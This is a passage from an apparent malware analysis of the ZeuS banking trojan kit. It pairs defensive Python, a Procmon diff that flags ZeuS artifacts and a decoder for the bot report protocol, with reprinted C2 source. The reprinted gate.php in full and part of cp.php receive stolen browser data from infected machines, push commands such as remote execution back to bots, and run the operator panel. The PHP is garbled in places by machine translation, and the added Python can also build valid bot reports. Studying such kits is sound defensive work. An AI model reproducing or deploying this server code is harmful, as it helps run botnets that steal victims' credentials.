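"8:02:12.5000000 PM","explorer.exe","1344","CreateFile","C:\\WINDOWS\\system32\\sdra64.exe:Zone.Identifier","SUCCESS","Desired Access: Generic Write"
"8:02:13.0000000 PM","svchost.exe","1144","RegOpenKey","HKLM\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\Missing","NAME NOT FOUND","Desired Access: Read"
"""

# Path fragments taken from the Rootkit Revealer findings in the report (matched case-insensitively).
ARTIFACT_MARKERS = ("\\system32\\lowsec\\", "\\system32\\sdra64.exe")


def parse_procmon_csv(text: str) -> list:
    """Parse a Procmon CSV export into a list of row dicts keyed by column name."""
    return list(csv.DictReader(io.StringIO(text)))


def event_key(event: dict) -> tuple:
    """Identity of an event for the diff: process, operation and path (time and PID vary)."""
    return (event["Process Name"], event["Operation"], event["Path"])


def new_successful_events(before_text: str, after_text: str) -> list:
    """Events present in the 'after' capture but not in 'before', keeping only Result == SUCCESS,
    which is the filter the report applied by hand in WinMerge and a spreadsheet."""
    seen = {event_key(e) for e in parse_procmon_csv(before_text)}
    return [e for e in parse_procmon_csv(after_text)
            if e["Result"] == "SUCCESS" and event_key(e) not in seen]


def count_by_process(events: list) -> Counter:
    """How many new successful operations each process performed."""
    return Counter(e["Process Name"] for e in events)


def flag_artifacts(events: list) -> list:
    """Return (process, operation, path) for events touching the known ZeuS artifact paths."""
    hits = []
    for e in events:
        path = e["Path"].lower()
        if any(marker in path for marker in ARTIFACT_MARKERS):
            hits.append((e["Process Name"], e["Operation"], e["Path"]))
    return hits


if __name__ == "__main__":
    new = new_successful_events(PROCMON_BEFORE, PROCMON_AFTER)
    print("new successful operations per process:", dict(count_by_process(new)))
    for proc, op, path in flag_artifacts(new):
        print(f"ARTIFACT  {proc:14} {op:14} {path}")
```

The alternate data stream sdra64.exe:Zone.Identifier is matched by the same marker as the executable, so a dropper that writes both shows up twice under the writing process.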

Inspection of cp.php and gate.php

gate.php (the Russian comments were translated with Google Translate online):

<? Php define ('__REPORT__', 1); / *

Gate.

The bot <-> server protocol has a bot side, which sends a report about something, and a server side, which sends changes to the settings (or commands). At one time the bot sends information about one event / object. * /

if (@ $ _SERVER ['REQUEST_METHOD']! == 'POST') die (); require_once ('system / global.php');

require_once ('system / config.php');


/ / Get the data. $ Data = @ file_get_contents ('php: / / input');

$ Data_size = @ strlen ($ data);

if ($ data_size <HEADER_SIZE + ITEM_HEADER_SIZE) die (); $ Data = RC4 ($ data, BOTNET_CRYPTKEY);

/ / Verefikatsiya. If the same MD5, it makes no sense to check something else. if (strcmp (md5 (substr ($ data, HEADER_SIZE), true), substr ($ data, HEADER_MD5, 16))! == 0) die ();

/ / Parses the data (Data compression is not supported). / / Congratulations mega hackers, this algorithm will allow you to easily read from a bot. Do not forget to write a parser 18 and 100

backdoors.

$ List = array (); for ($ i = HEADER_SIZE; $ i <$ data_size;)

{

$ K = @ unpack ('L4', @ substr ($ data, $ i, ITEM_HEADER_SIZE)); $ List [$ k [1]] = @ substr ($ data, $ i + ITEM_HEADER_SIZE, $ k [3]);

$ I + = (ITEM_HEADER_SIZE + $ k [3]);

}

unset ($ data);

/ / The main parameters that should always be. if (empty ($ list [SBCID_BOT_VERSION]) | | empty ($ list [SBCID_BOT_ID])) die ();

/ / Connect to the database. if (! ConnectToDB ()) die ();

////////////////////////////////////////////////// / / Process the data.

////////////////////////////////////////////////// //////////////////////////////////////////////////

$ Bot_id = str_replace ("\ x01", "\ x02", trim ($ list [SBCID_BOT_ID]));

$ Bot_id_q = addslashes ($ bot_id);

$ Botnet = (empty ($ list [SBCID_BOTNET]))? DEFAULT_BOTNET: str_replace ("\ x01", "\ x02", trim ($ list [SBCID_BOTNET]));

$ Botnet_q = addslashes ($ botnet);

$ Bot_version = ToUint ($ list [SBCID_BOT_VERSION]); $ Real_ipv4 = trim ((! Empty ($ _GET ['ip'])? $ _GET ['Ip']: $ _SERVER ['REMOTE_ADDR']));

$ Country = GetCountryIPv4 (); / / str_replace ("\ x01", "\ x02", GetCountryIPv4 ());

$ Country_q = addslashes ($ country); $ Curtime = time ();

$ Rtime_min_online = $ curtime - BOTNET_TIMEOUT; / / minimum time for which the bot is online.

/ / Report on execution of the script.

if (! empty ($ list [SBCID_SCRIPT_ID]) & & isset ($ list [SBCID_SCRIPT_STATUS], $ list [SBCID_SCRIPT_RESULT]) & &

strlen ($ list [SBCID_SCRIPT_ID]) == 16) {

if (! @ mysql_query ("INSERT INTO botnet_scripts_stat SET bot_id = '{$ bot_id_q}', bot_version = {$ bot_version}, rtime = {$

curtime},". "Extern_id = '". Addslashes ($ list [SBCID_SCRIPT_ID ])."',".

"Type =". (ToInt ($ list [SBCID_SCRIPT_STATUS]) == 0? 2: 3 ).",". "Report = '". Addslashes ($ list [SBCID_SCRIPT_RESULT ])."'")) die ();

}

/ / Write log / files. else if (! empty ($ list [SBCID_BOTLOG]) & &! empty ($ list [SBCID_BOTLOG_TYPE]))

{

$ Type = ToInt ($ list [SBCID_BOTLOG_TYPE]);

if ($ type == BLT_FILE)

{ / / Extensions, which are remote start.

$ Bad_exts = array ('. Php3', '. Php4', '. Php5', '. Php', '. Asp', '. Aspx', '. Exe', '. Pl', '. Cgi', '. cmd', '. bat', '. phtml', '. phtm');

$ Fd_hash = 0; $ Fd_size = strlen ($ list [SBCID_BOTLOG]);

/ / Generate the file name. if (IsHackNameForPath ($ bot_id) | | IsHackNameForPath ($ botnet)) die ();

$ File_root = REPORTS_PATH. '/ Files /'. Urlencode ($ botnet ).'/'. urlencode ($ bot_id);

$ File_path = $ file_root;


$ Last_name ='';

$ L = explode ('/', (isset ($ list [SBCID_PATH_DEST]) & & strlen ($ list [SBCID_PATH_DEST])> 0? Str_replace ('\ \', '/', $ list [SBCID_PATH_DEST]): 'unknown '));

foreach ($ l as & $ k)

{ if (IsHackNameForPath ($ k)) die ();

$ File_path .='/'.($ last_name = urlencode ($ k));

} if (strlen ($ last_name) === 0) $ file_path .= '/ unknown.dat';

unset ($ l);

/ / Check extension, and specify the file mask.

if (($ ext = strrchr ($ last_name,'.')) === false | | in_array (strtolower ($ ext), $ bad_exts)! == false) $ file_path .= '. dat';

$ Ext_pos = strrpos ($ file_path,'.');

/ / FIXME: If the name is too long.

if (strlen ($ file_path)> 180) $ file_path = $ file_root. '/ longname.dat';

/ / Add the file.

for ($ i = 0; $ i <9999; $ i + +)

{

if ($ i == 0) $ f = $ file_path;

else $ f = substr_replace ($ file_path,'('.$ i.').', $ ext_pos, 1);

if (file_exists ($ f))

{ if ($ fd_size == filesize ($ f))

{

if ($ fd_hash === 0) $ fd_hash = md5 ($ list [SBCID_BOTLOG], true); if (strcmp (md5_file ($ f, true), $ fd_hash) === 0) break;

}

} else

{

if (! CreateDir (dirname ($ file_path)) | |! ($ h = fopen ($ f, 'wb'))) die ();

flock ($ h, LOCK_EX);

fwrite ($ h, $ list [SBCID_BOTLOG]); flock ($ h, LOCK_UN);

fclose ($ h);

break;

}

} }

else

{ / / Write to the base.

if (REPORTS_TO_DB === 1)

{ $ Table = 'botnet_reports_'. Gmdate ('ymd', $ curtime);

$ Query = "INSERT DELAYED INTO {$ table} SET bot_id = '{$ bot_id_q}', botnet = '{$ botnet_q}', bot_version = {$ bot_version}, type = {$ type}, country = '{$ country_q } ', rtime = {$ curtime}, ".

"Path_source = '". (Empty ($ list [SBCID_PATH_SOURCE])?'': Addslashes ($ list [SBCID_PATH_SOURCE ]))."',".

"Path_dest = '". (Empty ($ list [SBCID_PATH_DEST])?'': Addslashes ($ list [SBCID_PATH_DEST ]))."',". "Time_system =". (Empty ($ list [SBCID_TIME_SYSTEM])? 0: ToUint ($ list [SBCID_TIME_SYSTEM ])).",".

"Time_tick =". (Empty ($ list [SBCID_TIME_TICK])? 0: ToUint ($ list [SBCID_TIME_TICK ])).",".

"Time_localbias =". (Empty ($ list [SBCID_TIME_LOCALBIAS])? 0: ToInt ($ list [SBCID_TIME_LOCALBIAS ])).",".

"Os_version = '". (Empty ($ list [SBCID_OS_INFO])?'': Addslashes ($ list [SBCID_OS_INFO ]))."',".

"Language_id =". (Empty ($ list [SBCID_LANGUAGE_ID])? 0: ToUshort ($ list [SBCID_LANGUAGE_ID ])).",".

"Process_name = '". (Empty ($ list [SBCID_PROCESS_NAME])?'': Addslashes ($ list [SBCID_PROCESS_NAME ]))."',". "Process_user = '". (Empty ($ list [SBCID_PROCESS_USER])?'': Addslashes ($ list [SBCID_PROCESS_USER ]))."',".

"Ipv4 = '". addslashes ($ real_ipv4 )."',".

"Context = '". addslashes ($ list [SBCID_BOTLOG ])."'";

/ / I think this arrangement improves performance.

if (! @ mysql_query ($ query) & & (! @ mysql_query ("CREATE TABLE IF NOT EXISTS {$ table} LIKE botnet_reports") | |! @ mysql_query ($ query))) die ();

}


/ / Write to file.

if (REPORTS_TO_FS === 1) {

if (IsHackNameForPath ($ bot_id) | | IsHackNameForPath ($ botnet)) die ();

$ File_path = REPORTS_PATH. '/ Other /'. Urlencode ($ botnet ).'/'. urlencode ($ bot_id); if (! CreateDir ($ file_path) | |! ($ h = fopen ($ file_path. '/ reports.txt', 'ab'))) die ();

flock ($ h, LOCK_EX); fwrite ($ h, str_repeat ("=", 1980). "\ r \ n".

"Bot_id = {$ bot_id} \ r \ n".

"Botnet = {$ botnet} \ r \ n". "Bot_version =". IntToVersion ($ bot_version). "\ R \ n".

"Ipv4 = {$ real_ipv4} \ r \ n".

"Country = {$ country} \ r \ n". "Type = {$ type} \ r \ n".

"Rtime =". gmdate ('H: i: s d.m.Y', $ curtime). "\ r \ n".

"Time_system =". (Empty ($ list [SBCID_TIME_SYSTEM])? 0: gmdate ('H: i: s dmY', ToInt ($ list [SBCID_TIME_SYSTEM ])))." \ r \ n ". / / Time () also returns a int .

"Time_tick =". (Empty ($ list [SBCID_TIME_TICK])? 0: TickCountToTime (ToUint ($ list [SBCID_TIME_TICK]) /

1000)). "\ R \ n".

"Time_localbias =". (Empty ($ list [SBCID_TIME_LOCALBIAS])? 0: TimeBiasToText (ToInt ($ list

[SBCID_TIME_LOCALBIAS ])))." \ r \ n ".

"Os_version =". (Empty ($ list [SBCID_OS_INFO])?'': OSDataToString ($ list [SBCID_OS_INFO ]))." \ r \ n ". "Language_id =". (Empty ($ list [SBCID_LANGUAGE_ID])? 0: ToUshort ($ list [SBCID_LANGUAGE_ID ]))." \ r \ n ".

"Process_name =". (Empty ($ list [SBCID_PROCESS_NAME])?'': $ List [SBCID_PROCESS_NAME]). "\ R \ n".

"Process_user =". (Empty ($ list [SBCID_PROCESS_USER])?'': $ List [SBCID_PROCESS_USER]). "\ R \ n". "Path_source =". (Empty ($ list [SBCID_PATH_SOURCE])?'': $ List [SBCID_PATH_SOURCE]). "\ R \ n".

"Context = \ r \ n". $ List [SBCID_BOTLOG]. "\ R \ n \ r \ n \ r \ n");

flock ($ h, LOCK_UN); fclose ($ h);

}

if (REPORTS_JN === 1) IMNotify ($ type, $ list, $ bot_id); }

}

/ / Report on online status. else if (! empty ($ list [SBCID_BOT_STATUS]))

{

/ / Standard request. $ Query = "bot_id = '{$ bot_id_q}', botnet = '{$ botnet_q}', bot_version = {$ bot_version}, country = '{$ country_q}', rtime_last =

{$ curtime},".

"Net_latency =". (Empty ($ list [SBCID_NET_LATENCY])? 0: ToUint ($ list [SBCID_NET_LATENCY ])).",".

"Port_s1 =". (Empty ($ list [SBCID_PORT_S1])? 0: ToUshort ($ list [SBCID_PORT_S1 ])).",".

"Time_localbias =". (Empty ($ list [SBCID_TIME_LOCALBIAS])? 0: ToInt ($ list [SBCID_TIME_LOCALBIAS ])).",". "Os_version = '". (Empty ($ list [SBCID_OS_INFO])?'': Addslashes ($ list [SBCID_OS_INFO ]))."',".

"Language_id =". (Empty ($ list [SBCID_LANGUAGE_ID])? 0: ToUshort ($ list [SBCID_LANGUAGE_ID ])).",".

"Ipv4 = '". addslashes ($ real_ipv4 )."',". "Flag_nat = IF (net_latency> 0, IF (port_s1> 0, 0, 1), 1 )";// FIXME: NAT Detect bots.

if (! mysql_query ("INSERT INTO botnet_list SET comments ='', rtime_first = {$ curtime}, rtime_online = {$ curtime}, flag_install =". (ToInt ($ list [SBCID_BOT_STATUS]) == BS_INSTALLED? 1: 0) . ", {$ query}".

"ON DUPLICATE KEY UPDATE rtime_online = IF (rtime_last <= {$ rtime_min_online}, {$ curtime}, rtime_online), {$ query}")) die ();

/ / Find the script to send. $ Reply_data ='';

$ Reply_count = 0;

$ Bot_id_qm = ToSQLSafeMask ($ bot_id_q);

$ Botnet_qm = ToSQLSafeMask ($ botnet_q);

$ Country_qm = ToSQLSafeMask ($ country_q);

$ R = @ mysql_query ("SELECT extern_id, script_bin, send_limit, id FROM botnet_scripts WHERE flag_enabled = 1 AND".

"(Countries_wl =''OR countries_wl LIKE BINARY '% \ x01 {$ country_qm} \ x01%') AND". "(Countries_bl NOT LIKE BINARY '% \ x01 {$ country_qm} \ x01%') AND".

"(Botnets_wl =''OR botnets_wl LIKE BINARY '% \ x01 {$ botnet_qm} \ x01%') AND".

"(Botnets_bl NOT LIKE BINARY '% \ x01 {$ botnet_qm} \ x01%') AND". "(Bots_wl =''OR bots_wl LIKE BINARY '% \ x01 {$ bot_id_qm} \ x01%') AND".

"(Bots_bl NOT LIKE BINARY '% \ x01 {$ bot_id_qm} \ x01%')".

"LIMIT 10");


if ($ r) while ((($ m = mysql_fetch_row ($ r)))) {

$ Eid = addslashes ($ m [0]);

/ / Check whether the limit is reached.

if ($ m [2], = 0 & & ($ j = @ mysql_query ("SELECT COUNT (*) FROM botnet_scripts_stat WHERE type = 1 AND extern_id =

'{$ eid }'")) & & ($ c = mysql_fetch_row ($ j)) & & $ c [0]> = $ m [2]) {

@ Mysql_query ("UPDATE botnet_scripts SET flag_enabled = 0 WHERE id = {$ m [3]} LIMIT 1");

continue; }

/ / Dobovlyaem bot in the list sent. if (@ mysql_query ("INSERT HIGH_PRIORITY INTO botnet_scripts_stat SET extern_id = '{$ eid}', type = 1, bot_id = '{$

bot_id_q}', bot_version = {$ bot_version}, rtime = {$ curtime}, report = ' Sended '"))

{ $ Size = strlen ($ m [1]) + strlen ($ m [0]);

$ Reply_data .= pack ('LLLL', + + $ reply_count, 0, $ size, $ size). $ M [0]. $ M [1];

}

}

if ($ reply_count> 0) {

$ Reply_data = pack ('LLL', HEADER_SIZE + strlen ($ reply_data), 0, $ reply_count). Md5 ($ reply_data, true). $ Reply_data;

echo RC4 ($ reply_data, BOTNET_CRYPTKEY); die ();

}

} else die ();

/ / Send an empty response. SendEmptyReply ();

////////////////////////////////////////////////// ///////////////////////////// / / Functions.

////////////////////////////////////////////////// /////////////////////////////

/ *

Send a blank response and output.

* / function SendEmptyReply ()

{

echo RC4 (pack ('LLL', HEADER_SIZE + ITEM_HEADER_SIZE, 0, 1). "\ x4A \ xE7 \ x13 \ x36 \ xE4 \ x4B \ xF9 \ xBF \ x79 \ xD2 \ x75 \ x2E \ x23 \ x48 \ x18 \ xA5 "." \ 0 \ 0 \ 0 \ 0 \ 0 \ 0 \ 0 \ 0 \ 0 \ 0 \ 0 \ 0 \ 0 \ 0 \ 0 \ 0 ", BOTNET_CRYPTKEY);

die ();

}

/ *

Getting the country.

Return - string, country. * /

function GetCountryIPv4 ()

{ global $ real_ipv4;

$ Ip = sprintf ('% u', ip2long ($ real_ipv4));

if (($ r = @ mysql_query ("SELECT c FROM ipv4toc WHERE l <='".$ ip." 'AND h >='".$ ip. "' LIMIT 1")) & & ($ m =

mysql_fetch_row ( $ r))! == false) return $ m [0];

else return'--';

}

/ *

Kovertatsiya Bin2UINT.

IN $ str - string, the original binary string.

Return - int, the converted number.

* /

function ToUint ($ str)


{

$ Q = @ unpack ('L', $ str); return is_array ($ q) & & is_numeric ($ q [1])? ($ Q [1] <0? Sprintf ('% u', $ q [1]): $ q [1]): 0;

}

/ *

Kovertatsiya Bin2INT.

IN $ str - string, the original binary string.

Return - int, the converted number. * /

function ToInt ($ str)

{ $ Q = @ unpack ('l', $ str);

return is_array ($ q) & & is_numeric ($ q [1])? $ Q [1]: 0;

}

/ *

Kovertatsiya Bin2SHORT.

IN $ str - string, the original binary string.

Return - int, the converted number.

* /

function ToUshort ($ str) {

$ Q = @ unpack ('S', $ str);

return is_array ($ q) & & is_numeric ($ q [1])? $ Q [1]: 0; }

/ * Checks whether a name uvyazimym as part of the road.

IN $ name - name to check. Return - true - if the name uvyazmo,

false - if not uvyazimo.

* / function IsHackNameForPath ($ name)

{

return (strlen ($ name)> 0 & & strcmp ($ name,'..')! == 0 & & strcmp ($ name, '.')! == 0 & & strpos ($ name, '/') === false & & strpos ($ name, '\ \') === false & & strpos ($ name, "\ x00") === false

)? false: true;

}

function IMNotify (& $ type, & $ list, & $ bot_id)

{ if (($ type == BLT_HTTP_REQUEST | | $ type == BLT_HTTPS_REQUEST) & &! empty ($ list [SBCID_PATH_SOURCE]))

{

$ Ml = split ("\ x01", REPORTS_JN_LIST); foreach ($ ml as & $ mask)

{ if (@ preg_match ('#^'. str_replace ('\ \ *','.*', preg_quote ($ mask,'#')).'$# i ', $ list [SBCID_PATH_SOURCE])> 0)

{

$ Message = htmlentities ("Bot ID:". $ Bot_id. "\ NURL:". $ List [SBCID_PATH_SOURCE]. "\ N \ n". Substr ($ list [SBCID_BOTLOG], 0, 1024));

error_reporting (0);

if (strlen (REPORTS_JN_LOGFILE)> 0 & & ($ fh = @ fopen (REPORTS_JN_LOGFILE, 'at'))! == false)

{ @ Fwrite ($ fh, $ message. "\ N \ n". Str_repeat ('=', 1940). "\ N \ n");

@ Fclose ($ fh);

}

require_once ("system / jabberclass.php");

$ Jab = new Jabber;

$ Jab-> server = REPORTS_JN_SERVER;

$ Jab-> port = REPORTS_JN_PORT;


$ Jab-> username = REPORTS_JN_ACCOUNT;

$ Jab-> password = REPORTS_JN_PASS;

if ($ jab-> Connect ())

{ $ Jab-> SendAuth ();

$ Jab-> SendPresence (NULL, NULL, "online");

$ Jab-> SendMessage (REPORTS_JN_TO, "normal", NULL, array ("body" => $ message)); $ Jab-> Disconnect ();

}

if (strlen (REPORTS_JN_SCRIPT)> 0)

{

$ Eid = md5 ($ mask, true); $ Script = 'rexec "'. Trim (REPORTS_JN_SCRIPT). '"-F';

$ Size = strlen ($ eid) + strlen ($ script);

$ Reply_data = pack ('LLLL', 1, 0, $ size, $ size). $ Eid. $ Script; echo RC4 (pack ('LLL', HEADER_SIZE + strlen ($ reply_data), 0, 1). md5 ($ reply_data, true). $ reply_data,

BOTNET_CRYPTKEY);

die ();

}

break;

} }

}

} ?>
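The bot-to-server report format that gate.php parses, decoded in Python as an added example for analysing a captured request body (this is not code from the report or from the kit). The header layout (three uint32 fields followed by the 16-byte MD5 of the body, so HEADER_SIZE = 28 and HEADER_MD5 = 12) and the 16-byte item header (id, flags, size, size) are inferred from the pack()/unpack() calls in the listing above; the item ids and key used as sample input are constructed placeholders, because the real SBCID_* values and BOTNET_CRYPTKEY live in system/global.php and system/config.php, which are not on the page.

```python
import hashlib
import struct

# Framing inferred from the pack()/unpack() calls in gate.php (added example, not kit code):
# header = uint32 total_size | uint32 flags | uint32 item_count | 16-byte MD5 of everything after the header
HEADER_SIZE = 28
HEADER_MD5 = 12          # offset of the MD5 inside the header
ITEM_HEADER_SIZE = 16    # unpack('L4'): item id, flags, size, size (duplicated)

# Constructed placeholders: the real SBCID_* ids and BOTNET_CRYPTKEY are defined in the kit's
# system/global.php and system/config.php, which the listing above does not include.
SBCID_BOT_ID = 10001
SBCID_BOTNET = 10002
SBCID_BOT_VERSION = 10003
SAMPLE_KEY = b"constructed-example-key"
SAMPLE_ITEMS = {
    SBCID_BOT_ID: b"KEVIN_A1B2C3D4",
    SBCID_BOTNET: b"btn1",
    SBCID_BOT_VERSION: struct.pack("<L", 0x02000000),  # little-endian uint32, as ToUint() reads it
}


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA). Encryption and decryption are the same operation."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for b in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(b ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def build_report(items: dict, key: bytes) -> bytes:
    """Frame items the way gate.php frames its own replies; used here only to make sample input."""
    body = b"".join(struct.pack("<LLLL", iid, 0, len(v), len(v)) + v for iid, v in items.items())
    header = struct.pack("<LLL", HEADER_SIZE + len(body), 0, len(items)) + hashlib.md5(body).digest()
    return rc4(key, header + body)


def parse_report(blob: bytes, key: bytes) -> dict:
    """Decrypt a captured request body and return {item_id: payload}, mirroring gate.php's checks."""
    data = rc4(key, blob)
    if len(data) < HEADER_SIZE + ITEM_HEADER_SIZE:
        raise ValueError("report too short")
    # gate.php: md5(substr($data, HEADER_SIZE)) must equal substr($data, HEADER_MD5, 16)
    if hashlib.md5(data[HEADER_SIZE:]).digest() != data[HEADER_MD5:HEADER_MD5 + 16]:
        raise ValueError("MD5 mismatch: wrong key or truncated capture")
    items = {}
    i = HEADER_SIZE
    while i < len(data):
        if i + ITEM_HEADER_SIZE > len(data):
            raise ValueError("truncated item header")
        iid, _flags, size, _size_again = struct.unpack_from("<LLLL", data, i)
        if i + ITEM_HEADER_SIZE + size > len(data):
            # gate.php silently truncates here via @substr; a decoder should refuse instead
            raise ValueError("item size exceeds report")
        items[iid] = data[i + ITEM_HEADER_SIZE:i + ITEM_HEADER_SIZE + size]  # later duplicates win, as in PHP
        i += ITEM_HEADER_SIZE + size
    return items


def is_valid_report(blob: bytes, key: bytes) -> bool:
    """True when the blob decrypts under key to a well-formed report with a matching MD5."""
    try:
        parse_report(blob, key)
        return True
    except ValueError:
        return False


def to_uint(raw: bytes) -> int:
    """Equivalent of ToUint(): first little-endian uint32 of the payload, 0 if it is too short."""
    return struct.unpack_from("<L", raw)[0] if len(raw) >= 4 else 0


if __name__ == "__main__":
    blob = build_report(SAMPLE_ITEMS, SAMPLE_KEY)
    for iid, payload in parse_report(blob, SAMPLE_KEY).items():
        print(iid, hex(to_uint(payload)) if iid == SBCID_BOT_VERSION else payload)
```

Because the MD5 covers only the body and the key is a fixed per-botnet secret, a capture that fails the check under the configured key is either from a different build of the kit or was cut short in the capture.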

cp.php (the Russian comments were translated with Google Translate online):

<? Php define ('__CP__', 1);

require_once ('system / global.php');

if (! @ include_once ('system / config.php')) die ('Hello! How are you?');

////////////////////////////////////////////////// /////////////////////////////

/ / Constants. ////////////////////////////////////////////////// /////////////////////////////

define ('CURRENT_TIME', time ()); / / Current time. define ('ONLINE_TIME_MIN', (CURRENT_TIME - BOTNET_TIMEOUT)); / / Minimum time for the status of "Online."

define ('DEFAULT_LANGUAGE', 'en'); / / default language.

define ('THEME_PATH', 'theme'); / / folder for the theme.

/ / HTTP requests.

define ('QUERY_SCRIPT', basename ($ _SERVER ['PHP_SELF'])); define ('QUERY_SCRIPT_HTML', QUERY_SCRIPT);

define ('QUERY_VAR_MODULE', 'm'); / / variable points to the current module. define ('QUERY_STRING_BLANK', QUERY_SCRIPT. '? m ='); / / Empty query string.

define ('QUERY_STRING_BLANK_HTML', QUERY_SCRIPT_HTML. '? m ='); / / Empty query string in HTML.

define ('CP_HTTP_ROOT', str_replace ('\ \', '/', (! empty ($ _SERVER ['SCRIPT_NAME'])? dirname ($ _SERVER ['SCRIPT_NAME']):'/'))); / / The root of the CP.

/ / A session cookie. define ('COOKIE_USER', 'p'); / / username in cookies.

define ('COOKIE_PASS', 'u'); / / user password in the cookie.

define ('COOKIE_LIVETIME', CURRENT_TIME + 2592000) / / Lifetime of cookies. define ('COOKIE_SESSION', 'ref'); / / variable to store the session.

define ('SESSION_LIVETIME', CURRENT_TIME + 1300) / / Lifetime of the session.

////////////////////////////////////////////////// /////////////////////////////

/ / Initialize.

////////////////////////////////////////////////// /////////////////////////////

/ / Connect to the database.


if (! ConnectToDB ()) die (mysql_error_ex ());

/ / Connect the topic.

require_once (THEME_PATH. '/ index.php');

/ Management / login.

if (! empty ($ _GET [QUERY_VAR_MODULE]))

{ / / Login form.

if (strcmp ($ _GET [QUERY_VAR_MODULE], 'login') === 0)

{ UnlockSessionAndDestroyAllCokies ();

if (isset ($ _POST ['user']) & & isset ($ _POST ['pass'])) {

$ User = $ _POST ['user'];

$ Pass = md5 ($ _POST ['pass']);

/ / Check the login.

if (@ mysql_query ("SELECT id FROM cp_users WHERE name = '". addslashes ($ user). "' AND pass = '". addslashes ($ pass). "'

AND flag_enabled = '1 'LIMIT 1") & & @ mysql_affected_rows () == 1)

{

if (isset ($ _POST ['remember']) & & $ _POST ['remember'] == 1) {

setcookie (COOKIE_USER, md5 ($ user), COOKIE_LIVETIME, CP_HTTP_ROOT);

setcookie (COOKIE_PASS, $ pass, COOKIE_LIVETIME, CP_HTTP_ROOT); }

LockSession (); $ _SESSION ['Name'] = $ user;

$ _SESSION ['Pass'] = $ pass;

/ / UnlockSession ();

header ('Location:'. QUERY_STRING_BLANK. 'home');

} else ShowLoginForm (true);

die ();

}

ShowLoginForm (false);

die (); }

/ / Exit if (strcmp ($ _GET ['m'], 'logout') === 0)

{

UnlockSessionAndDestroyAllCokies (); header ('Location:'. QUERY_STRING_BLANK. 'login');

die ();

} }

////////////////////////////////////////////////// /////////////////////////////

/ / Check the login data.

////////////////////////////////////////////////// /////////////////////////////

$ Logined = 0, / / flag means zalogininy we.

/ / Login through the session.

LockSession ();

if (! empty ($ _SESSION ['name']) & &! empty ($ _SESSION ['pass'])) {

if (($ r = @ mysql_query ("SELECT * FROM cp_users WHERE name = '". addslashes ($ _SESSION [' name'])."' AND pass = '".

addslashes ($ _SESSION [' pass']). "'AND flag_enabled = '1' LIMIT 1 ")))$ logined = @ mysql_affected_rows (); }

/ / Login through cookies.

if ($ logined! == 1 & &! empty ($ _COOKIE [COOKIE_USER]) & &! empty ($ _COOKIE [COOKIE_PASS])) {

if (($ r = @ mysql_query ("SELECT * FROM cp_users WHERE MD5 (name )='". addslashes ($ _COOKIE [COOKIE_USER ])."'

AND pass = '". addslashes ($ _COOKIE [COOKIE_PASS]). " 'AND flag_enabled = '1' LIMIT 1 ")))$ logined = @


mysql_affected_rows ();

} / / Unable to login.

if ($ logined! == 1)

{ UnlockSessionAndDestroyAllCokies ();

header ('Location:'. QUERY_STRING_BLANK. 'login');

die (); }

/ / Get the user data. $ _USER_DATA = @ Mysql_fetch_assoc ($ r);

if ($ _USER_DATA === false) die (mysql_error_ex ());

$ _SESSION ['Name'] = $ _USER_DATA ['name']; $ _SESSION ['Pass'] = $ _USER_DATA ['pass'];

/ / Connect the tongue. if (@ strlen ($ _USER_DATA ['language'])! = 2 | |! SafePath ($ _USER_DATA ['language']) | |! file_exists ('system / lng .'.$_

USER_DATA [' language '].' . php'))$_ USER_DATA ['language'] = DEFAULT_LANGUAGE;

require_once ('system / lng .'.$_ USER_DATA [' language'].'. php ');

UnlockSession ();

////////////////////////////////////////////////// /////////////////////////////

/ / Define the menu.

////////////////////////////////////////////////// /////////////////////////////

/ / Main Menu.

$ _MAINMENU = Array (/ / module. / / Title. / / Required Rights. array (0, LNG_MM_STATS, array ()),

array ('stats_main', LNG_MM_STATS_MAIN, array ('r_stats_main')),

array ('stats_os', LNG_MM_STATS_OS, array ('r_stats_os')),

array (0, LNG_MM_BOTNET, array ()),

array ('botnet_bots', LNG_MM_BOTNET_BOTS, array ('r_botnet_bots')), array ('botnet_scripts', LNG_MM_BOTNET_SCRIPTS, array ('r_botnet_scripts')),

array (0, LNG_MM_REPORTS, array ()), array ('reports_db', LNG_MM_REPORTS_DB, array ('r_reports_db')),

array ('reports_files', LNG_MM_REPORTS_FILES, array ('r_reports_files')),

array ('reports_jn', LNG_MM_REPORTS_JN, array ('r_reports_jn')),

array (0, LNG_MM_SYSTEM, array ()),

array ('sys_info', LNG_MM_SYSTEM_INFO, array ('r_system_info')), array ('sys_options', LNG_MM_SYSTEM_OPTIONS, array ('r_system_options')),

array ('sys_user', LNG_MM_SYSTEM_USER, array ('r_system_user')),

array ('sys_users', LNG_MM_SYSTEM_USERS, array ('r_system_users')) );

/ / Menu Deytvie over bot. Also used for an array of bots. $ _BOT_MENU = Array (

array ('fullinfo', LNG_MBA_FULLINFO, array ('r_botnet_bots')), array ('fullinfoss', LNG_MBA_FULLINFOSS, array ('r_botnet_bots')),

array (0, LNG_MBA_SEPARATOR, array ()), array ('today_dbreports', LNG_MBA_TODAY_DBREPORTS, array ('r_reports_db')),

array ('week_dbreports', LNG_MBA_WEEK_DBREPORTS, array ('r_reports_db')),

array ('files', LNG_MBA_FILES, array ('r_reports_files')),

array (0, LNG_MBA_SEPARATOR, array ()),

array ('remove', LNG_MBA_REMOVE, array ('r_edit_bots')), array ('removeex', LNG_MBA_REMOVE_REPORTS, array ('r_edit_bots', 'r_reports_db_edit', 'r_reports_files_edit')),

array (0, LNG_MBA_SEPARATOR, array ()), array ('port_socks', LNG_MBA_PORT_SOCKS, array ('r_botnet_bots')),

array ('newscript', LNG_MBA_NEWSCRIPT, array ('r_botnet_scripts_edit'))

);

OptimizeMenu ($ _BOT_MENU, false);


////////////////////////////////////////////////// /////////////////////////////

/ / Handle the group of bots. ////////////////////////////////////////////////// /////////////////////////////

if ((! empty ($ _GET ['botsaction']) | |! empty ($ _POST ['botsaction'])) & & ((! empty ($ _POST ['bots']) & & is_array ($ _POST [' bots '])) | | (! empty ($ _GET [' bots ']) & & is_array ($ _GET [' bots']))))

{

